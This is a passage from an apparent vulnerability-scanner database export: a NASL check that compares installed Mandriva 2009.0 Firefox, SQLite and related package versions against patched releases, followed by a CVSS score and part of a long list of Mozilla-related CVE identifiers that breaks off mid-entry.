NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bn\", rpm:\"firefox-bn~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ca\", rpm:\"firefox-ca~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cs\", rpm:\"firefox-cs~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cy\", rpm:\"firefox-cy~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-da\", rpm:\"firefox-da~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-de\", rpm:\"firefox-de~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-devel\", rpm:\"firefox-devel~3.6.3~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-el\", rpm:\"firefox-el~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-en_GB\", rpm:\"firefox-en_GB~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eo\", rpm:\"firefox-eo~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_AR\", rpm:\"firefox-es_AR~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_ES\", rpm:\"firefox-es_ES~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-et\", rpm:\"firefox-et~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eu\", rpm:\"firefox-eu~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-beagle\", rpm:\"firefox-ext-beagle~0.3.8~13.19mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-blogrovr\", rpm:\"firefox-ext-blogrovr~1.1.804~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-mozvoikko\", rpm:\"firefox-ext-mozvoikko~1.0~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-scribefire\", rpm:\"firefox-ext-scribefire~3.5.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-xmarks\", rpm:\"firefox-ext-xmarks~3.5.10~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fi\", rpm:\"firefox-fi~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fr\", rpm:\"firefox-fr~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fy\", rpm:\"firefox-fy~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ga_IE\", rpm:\"firefox-ga_IE~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gl\", rpm:\"firefox-gl~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gu_IN\", rpm:\"firefox-gu_IN~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-he\", rpm:\"firefox-he~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hi\", rpm:\"firefox-hi~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hu\", rpm:\"firefox-hu~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-id\", rpm:\"firefox-id~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-is\", rpm:\"firefox-is~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-it\", rpm:\"firefox-it~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ja\", rpm:\"firefox-ja~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-kn\", rpm:\"firefox-kn~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ko\", rpm:\"firefox-ko~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lt\", rpm:\"firefox-lt~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lv\", rpm:\"firefox-lv~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mk\", rpm:\"firefox-mk~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mr\", rpm:\"firefox-mr~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nb_NO\", rpm:\"firefox-nb_NO~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nl\", rpm:\"firefox-nl~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nn_NO\", rpm:\"firefox-nn_NO~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pa_IN\", rpm:\"firefox-pa_IN~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pl\", rpm:\"firefox-pl~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_BR\", rpm:\"firefox-pt_BR~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_PT\", rpm:\"firefox-pt_PT~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ro\", rpm:\"firefox-ro~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ru\", rpm:\"firefox-ru~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-si\", rpm:\"firefox-si~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sk\", rpm:\"firefox-sk~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sl\", rpm:\"firefox-sl~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sq\", rpm:\"firefox-sq~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sv_SE\", rpm:\"firefox-sv_SE~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-te\", rpm:\"firefox-te~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-th\", rpm:\"firefox-th~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-theme-kfirefox\", rpm:\"firefox-theme-kfirefox~0.16~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-tr\", rpm:\"firefox-tr~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-uk\", rpm:\"firefox-uk~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_CN\", rpm:\"firefox-zh_CN~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_TW\", rpm:\"firefox-zh_TW~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-extras\", rpm:\"gnome-python-extras~2.19.1~20.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gda\", rpm:\"gnome-python-gda~2.19.1~20.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gda-devel\", rpm:\"gnome-python-gda-devel~2.19.1~20.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gdl\", rpm:\"gnome-python-gdl~2.19.1~20.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkhtml2\", rpm:\"gnome-python-gtkhtml2~2.19.1~20.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkmozembed\", rpm:\"gnome-python-gtkmozembed~2.19.1~20.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkspell\", rpm:\"gnome-python-gtkspell~2.19.1~20.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lemon\", rpm:\"lemon~3.6.23.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdevhelp-1_0\", rpm:\"libdevhelp-1_0~0.21~3.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdevhelp-1-devel\", rpm:\"libdevhelp-1-devel~0.21~3.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3_0\", rpm:\"libsqlite3_0~3.6.23.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3-devel\", rpm:\"libsqlite3-devel~3.6.23.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3-static-devel\", rpm:\"libsqlite3-static-devel~3.6.23.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner1.9.2.3\", rpm:\"libxulrunner1.9.2.3~1.9.2.3~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner-devel\", rpm:\"libxulrunner-devel~1.9.2.3~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-beagle\", rpm:\"mozilla-thunderbird-beagle~0.3.8~13.19mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sqlite3-tools\", rpm:\"sqlite3-tools~3.6.23.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tcl-sqlite3\", rpm:\"tcl-sqlite3~3.6.23.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~1.9.2.3~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"yelp\", rpm:\"yelp~2.24.0~3.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-l10n\", rpm:\"firefox-l10n~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sqlite3\", rpm:\"sqlite3~3.6.23.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64devhelp-1_0\", rpm:\"lib64devhelp-1_0~0.21~3.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64devhelp-1-devel\", rpm:\"lib64devhelp-1-devel~0.21~3.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3_0\", rpm:\"lib64sqlite3_0~3.6.23.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3-devel\", rpm:\"lib64sqlite3-devel~3.6.23.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3-static-devel\", rpm:\"lib64sqlite3-static-devel~3.6.23.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner1.9.2.3\", rpm:\"lib64xulrunner1.9.2.3~1.9.2.3~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner-devel\", rpm:\"lib64xulrunner-devel~1.9.2.3~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1945", "CVE-2011-3648", "CVE-2009-0355", "CVE-2011-0061", "CVE-2011-0077", "CVE-2012-0478", "CVE-2012-4193", "CVE-2011-1202", "CVE-2012-0442", "CVE-2010-3772", "CVE-2011-0071", "CVE-2009-2470", "CVE-2010-0654", "CVE-2009-3388", "CVE-2012-1962", "CVE-2012-0443", "CVE-2011-3866", "CVE-2011-0068", "CVE-2012-5842", "CVE-2012-4212", "CVE-2009-2477", "CVE-2009-1563", "CVE-2010-0176", "CVE-2011-3640", "CVE-2011-0083", "CVE-2010-1203", "CVE-2009-3076", "CVE-2012-1970", "CVE-2009-3389", "CVE-2008-3835", "CVE-2012-3989", "CVE-2010-2762", "CVE-2012-5830", "CVE-2012-4210", "CVE-2009-1305", "CVE-2011-3026", "CVE-2009-3979", "CVE-2011-2370", "CVE-2012-0460", "CVE-2012-1973", "CVE-2009-3376", "CVE-2011-2369", "CVE-2011-2998", "CVE-2011-3654", "CVE-2011-2605", "CVE-2009-1833", "CVE-2010-0165", "CVE-2012-1974", "CVE-2010-0220", "CVE-2010-2766", "CVE-2011-2993", "CVE-2012-4195", "CVE-2010-0168", "CVE-2012-3986", "CVE-2010-0160", "CVE-2009-1169", "CVE-2011-2371", "CVE-2009-3379", "CVE-2012-4185", "CVE-2010-3777", "CVE-2012-3991", "CVE-2012-5354", "CVE-2012-4206", "CVE-2009-3071", "CVE-2012-3968", "CVE-2010-1214", "CVE-2012-3963", "CVE-2010-0174", "CVE-2010-0172", "CVE-2009-2535", "CVE-2012-0452", "CVE-2009-1312", "CVE-2012-1956", "CVE-2012-3978", "CVE-2012-3985", "CVE-2011-2995", "CVE-2012-5829", "CVE-2009-1571", "CVE-2008-5505", "CVE-2012-5838", "CVE-2011-2986", "CVE-2010-1205", "CVE-2009-2210", "CVE-2009-2478", "CVE-2008-6961", "CVE-2012-0479", "CVE-2012-0450", "CVE-2012-1940", "CVE-2012-3993", "CVE-2008-5500", "CVE-2012-5836", "CVE-2009-3274", "CVE-2010-1125", "CVE-2009-0772", "CVE-2012-3995", "CVE-2012-4201", "CVE-2010-0159", "CVE-2009-0773", "CVE-2011-3659", "CVE-2011-3663", "CVE-2010-3131", "CVE-2012-0470", "CVE-2012-0446", "CVE-2008-4063", "CVE-2012-3976", "CVE-2012-1972", "CVE-2010-1200", "CVE-2010-0175", "CVE-2010-0170", "CVE-2012-3988", "CVE-2012-0457", "CVE-2010-3778", "CVE-2012-3994", "CVE-2007-2436", "CVE-2012-3962", "CVE-2010-2770", "CVE-2010-3774", "CVE-2012-0459", "CVE-2011-2362", "CVE-2009-1304", "CVE-2010-1213", "CVE-2010-3177", "CVE-2012-5843", "CVE-2009-1835", "CVE-2011-0085", "CVE-2009-0352", "CVE-2009-3984", "CVE-2009-3380", "CVE-2008-5510", "CVE-2011-0080", "CVE-2012-1950", "CVE-2008-5502", "CVE-2009-3981", "CVE-2010-3765", "CVE-2010-0167", "CVE-2009-3373", "CVE-2009-3980", "CVE-2008-4070", "CVE-2012-4183", "CVE-2010-3178", "CVE-2012-1994", "CVE-2011-3661", "CVE-2009-3383", "CVE-2012-4181", "CVE-2011-3652", "CVE-2009-1311", "CVE-2011-1712", "CVE-2008-4067", "CVE-2010-1210", "CVE-2011-2364", "CVE-2009-2469", "CVE-2011-0073", "CVE-2010-1197", "CVE-2010-1207", "CVE-2009-0652", "CVE-2012-4186", "CVE-2012-1948", "CVE-2008-5012", "CVE-2011-2982", "CVE-2012-1938", "CVE-2012-0449", "CVE-2010-3769", "CVE-2012-3969", "CVE-2009-1838", "CVE-2012-1953", "CVE-2008-5013", "CVE-2012-1949", "CVE-2012-0456", "CVE-2011-2372", "CVE-2010-3773", "CVE-2009-1309", "CVE-2011-0079", "CVE-2010-3169", "CVE-2009-2662", "CVE-2012-3970", "CVE-2011-2997", "CVE-2011-0053", "CVE-2009-1832", "CVE-2012-5840", "CVE-2010-3176", "CVE-2012-4191", "CVE-2010-3174", "CVE-2012-1966", "CVE-2010-3768", "CVE-2009-3372", "CVE-2010-2763", "CVE-2011-0066", "CVE-2010-1212", "CVE-2009-1837", "CVE-2010-1206", "CVE-2010-1211", "CVE-2009-2464", "CVE-2011-2990", "CVE-2010-1121", "CVE-2009-0356", "CVE-2011-3389", "CVE-2010-0164", "CVE-2008-3836", "CVE-2010-3167", "CVE-2012-4202", "CVE-2007-2671", "CVE-2011-2984", "CVE-2010-3180", "CVE-2012-3957", "CVE-2011-3660", "CVE-2009-3986", "CVE-2012-1941", "CVE-2009-2408", "CVE-2010-3399", "CVE-2009-2665", "CVE-2008-4066", "CVE-2008-5018", "CVE-2009-3978", "CVE-2012-3984", "CVE-2009-0354", "CVE-2009-3079", "CVE-2011-0056", "CVE-2012-0444", "CVE-2011-3650", "CVE-2010-2753", "CVE-2012-1946", "CVE-2010-3776", "CVE-2010-1215", "CVE-2012-4182", "CVE-2011-2980", "CVE-2012-4187", "CVE-2008-4069", "CVE-2010-0166", "CVE-2011-3647", "CVE-2011-0065", "CVE-2011-0062", "CVE-2008-0016", "CVE-2009-0358", "CVE-2011-3101", "CVE-2010-3168", "CVE-2010-0173", "CVE-2009-1044", "CVE-2008-5513", "CVE-2008-4059", "CVE-2010-2764", "CVE-2011-0081", "CVE-2009-0771", "CVE-2009-1392", "CVE-2008-5504", "CVE-2008-5019", "CVE-2012-1954", "CVE-2009-0774", "CVE-2009-3375", "CVE-2012-0461", "CVE-2011-2376", "CVE-2009-2472", "CVE-2012-3958", "CVE-2009-0071", "CVE-2008-5023", "CVE-2012-0469", "CVE-2010-3171", "CVE-2009-3072", "CVE-2012-3973", "CVE-2008-5822", "CVE-2012-1975", "CVE-2011-0075", "CVE-2012-0464", "CVE-2012-1967", "CVE-2011-3653", "CVE-2010-0648", "CVE-2010-0178", "CVE-2010-3166", "CVE-2010-0177", "CVE-2011-0074", "CVE-2012-3956", "CVE-2010-2769", "CVE-2011-3649", "CVE-2012-3982", "CVE-2009-3555", "CVE-2011-2989", "CVE-2010-1196", "CVE-2008-3837", "CVE-2009-0357", "CVE-2008-5021", "CVE-2008-5017", "CVE-2012-3966", "CVE-2012-5839", "CVE-2011-2378", "CVE-2009-1308", "CVE-2010-3775", "CVE-2009-2467", "CVE-2012-1961", "CVE-2010-5074", "CVE-2011-2996", "CVE-2010-3173", "CVE-2012-4216", "CVE-2008-4062", "CVE-2010-3179", "CVE-2010-0182", "CVE-2012-3967", "CVE-2011-3651", "CVE-2008-4060", "CVE-2010-0181", "CVE-2012-1951", "CVE-2012-0475", "CVE-2012-3965", "CVE-2012-1952", "CVE-2010-1201", "CVE-2011-4688", "CVE-2009-1306", "CVE-2010-1585", "CVE-2009-2479", "CVE-2012-3959", "CVE-2012-0455", "CVE-2009-0777", "CVE-2010-2755", "CVE-2011-0084", "CVE-2011-0051", "CVE-2010-3767", "CVE-2012-1939", "CVE-2009-1834", "CVE-2010-3771", "CVE-2010-0183", "CVE-2012-0474", "CVE-2012-3975", "CVE-2010-2768", "CVE-2008-5014", "CVE-2008-0367", "CVE-2008-4058", "CVE-2011-3002", "CVE-2012-4184", "CVE-2011-0057", "CVE-2012-0447", "CVE-2011-3232", "CVE-2008-5913", "CVE-2007-3073", "CVE-2012-4205", "CVE-2010-2751", "CVE-2009-1836", "CVE-2011-0069", "CVE-2008-5022", "CVE-2008-5512", "CVE-2012-3992", "CVE-2009-3374", "CVE-2008-5501", "CVE-2008-4068", "CVE-2008-5016", "CVE-2011-3004", "CVE-2012-3980", "CVE-2008-5503", "CVE-2011-2374", "CVE-2012-1955", "CVE-2009-1839", "CVE-2012-1960", "CVE-2012-0445", "CVE-2009-3074", "CVE-2012-1965", "CVE-2011-3670", "CVE-2012-0462", "CVE-2010-1028", "CVE-2010-0162", "CVE-2011-2377", "CVE-2009-2463", "CVE-2009-2061", "CVE-2009-3070", "CVE-2012-3977", "CVE-2011-3000", "CVE-2010-2765", "CVE-2009-3069", "CVE-2010-0171", "CVE-2010-2767", "CVE-2009-0353", "CVE-2011-0078", "CVE-2012-3960", "CVE-2010-3175", "CVE-2009-0775", "CVE-2012-0451", "CVE-2011-3655", "CVE-2012-4180", "CVE-2009-2044", "CVE-2010-3182", "CVE-2009-0776", "CVE-2009-3371", "CVE-2009-3377", "CVE-2012-1959", "CVE-2011-2363", "CVE-2009-3075", "CVE-2010-0163", "CVE-2010-1208", "CVE-2011-0070", "CVE-2012-1947", "CVE-2009-1841", "CVE-2010-3170", "CVE-2011-3005", "CVE-2011-0059", "CVE-2012-1971", "CVE-2009-3983", "CVE-2012-4208", "CVE-2009-3987", "CVE-2011-3658", "CVE-2011-2373", "CVE-2008-5511", "CVE-2012-1957", "CVE-2012-1958", "CVE-2011-0054", "CVE-2012-4190", "CVE-2008-4064", "CVE-2012-1976", "CVE-2011-1187", "CVE-2012-5835", "CVE-2010-3183", "CVE-2009-2654", "CVE-2010-1202", "CVE-2012-0468", "CVE-2009-3982", "CVE-2009-3985", "CVE-2009-2065", "CVE-2009-1313", "CVE-2009-3382", "CVE-2008-5508", "CVE-2012-3972", "CVE-2012-4207", "CVE-2011-2988", "CVE-2010-3770", "CVE-2008-4061", "CVE-2010-1199", "CVE-2012-4204", "CVE-2008-0017", "CVE-2009-3988", "CVE-2010-3400", "CVE-2009-1302", "CVE-2011-2985", "CVE-2009-2466", "CVE-2012-4192", "CVE-2011-0058", "CVE-2011-2987", "CVE-2012-4188", "CVE-2012-0441", "CVE-2008-5024", "CVE-2011-0076", "CVE-2007-2437", "CVE-2012-5833", "CVE-2011-2999", "CVE-2012-3964", "CVE-2012-5841", "CVE-2010-0179", "CVE-2010-1209", "CVE-2010-2754", "CVE-2008-5507", "CVE-2009-2471", "CVE-2012-3990", "CVE-2011-2375", "CVE-2010-1198", "CVE-2008-4065", "CVE-2009-1840", "CVE-2011-3665", "CVE-2009-3381", "CVE-2011-0067", "CVE-2010-2760", "CVE-2012-1937", "CVE-2012-4215", "CVE-2009-2043", "CVE-2009-1307", "CVE-2009-2664", 